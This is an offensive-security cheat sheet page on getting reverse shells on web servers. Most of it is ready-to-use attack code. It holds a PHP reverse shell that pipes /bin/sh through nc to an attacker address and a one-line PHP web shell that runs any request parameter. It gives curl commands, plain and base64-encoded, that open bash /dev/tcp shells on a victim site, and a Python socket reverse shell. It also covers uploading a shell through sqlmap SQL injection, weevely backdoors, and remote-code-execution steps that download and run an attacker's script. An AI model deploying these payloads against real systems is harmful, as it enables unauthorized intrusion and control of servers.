Web Reverse Shell

Last modified: Tue Nov 21 2023 00:00:00 GMT+0000 (Coordinated Universal Time)

Privilege Escalation Reverse Shell Web

We can get a shell by putting the reverse shell payload into target website.

PHP Reverse Shell (Linux)

# From local script (it's stored by default in Kali or Parrot)
cp /usr/share/webshell/php/php-reverse-shell.php ./shell.php

# From repo (https://github.com/pentestmonkey/php-reverse-shell)
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php
# From repo (https://github.com/flozz/p0wny-shell)
wget https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php -O shell.php

Replace the $ip and the $port in the script with your local ip and port.

Without fsockopen, and for FreeBSD

<?php
set_time_limit (0);
$ip = '10.0.0.1';  // CHANGE THIS
$port = 4444;      // CHANGE THIS

// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
2 => array("file", "/tmp/error-output.txt", "a")   // stderr is a pipe that the child will write to
);

$cwd = "/tmp";
$env = array('some_option' => 'aeiou');

$process = proc_open('sh', $descriptorspec, $pipes, $cwd, $env);

if (is_resource($process)) {
    fwrite($pipes[0], 'rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $port >/tmp/f');
    fclose($pipes[0]);

    echo stream_get_contents($pipes[1]);
    fclose($pipes[1]);

    $return_value = proc_close($process);
    echo "command returned $return_value\n";
}
?>

Using Web Shell

Create a PHP script to allow us to execute arbitrary command.

<?php system($_REQUEST['test']); ?>

Then upload it to target website.
Now we might be able to execute arbitrary command, in short, reverse shell as below.

curl https://victim.com/uploads/shell.php?test='bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"'

# Base64 encoded payload
curl https://victim.com/uploads/shell.php?test='echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA+JjEi | base64 -d | bash'

PHP Revese Shell (Windows)

Below are the available payloads.


Python Reverse Shell (Linux)

It's required to upload a payload and command execution in the target website for successful.
First, create a Python file e.g. "revshell.py". Replace the ip and the port with your own.

# revshell.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])

Then upload it to the target website.
Next start a listener in local machine.

nc -lvnp 4444

Now we need to command execution by somehow in the target website.

python3 /path/to/revshell.py

If success, we should get a shell.


ASP.NET

We can use .aspx file for reverse shell. Download from here.


Upload Script via SQLi

# req.txt: The request settings file which is saved using Burp Suite
sqlmap -r req.txt --dbs --random-agent --batch --file-dest=/var/www/html/shell.php --file-write=./shell.php

Useful Tools

  • Weevely3

    A web shell generator.

    1. Generate Backdoor with Password

      Credentials required.

      weevely generate <password> ./shell.php
      
    2. Upload the Payload to Target Website and Execute Commands

      weevely https://vulnerable.com/upload/shell.php <password> whoami
      
    3. Get a Shell

      weevely https://vulnerable.com/upload/shell.php <password>
      

Shell Script & Remote Code Execution (RCE)

If we can find a website is vulnerable to Remote Code Execution but cannot Reverse Shell, we may be able to do that by uploading the script.

1. Create a shell script to reverse shell.

This file is named "revshell.sh".

#!/bin/bash
bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1

2. Upload the script to website

Start web server in local machine to upload the script.

python3 -m http.server 8000

Then upload it by remote code execution in target website.

https://vulnerable.com/?cmd=wget http://<local-ip>:8000/revshell.sh
# or
https://vulnerable.com/?cmd=curl <local-ip>:8000/revshell.sh

To confirm the script uploaded, execute the following RCE.

https://vulnerable.com/?cmd=ls

3. Get a shell

Start listener for getting a shell in local machine.

nc -lvnp 4444

Now execute the uploaded script via RCE.

# 1. Change permission for the script
https://vulenrable.com/?cmd=chmod 777 revshell.sh
# 2. Execute the script
https://vulnerable.com/?cmd=./revshell.sh

We should now get the target shell.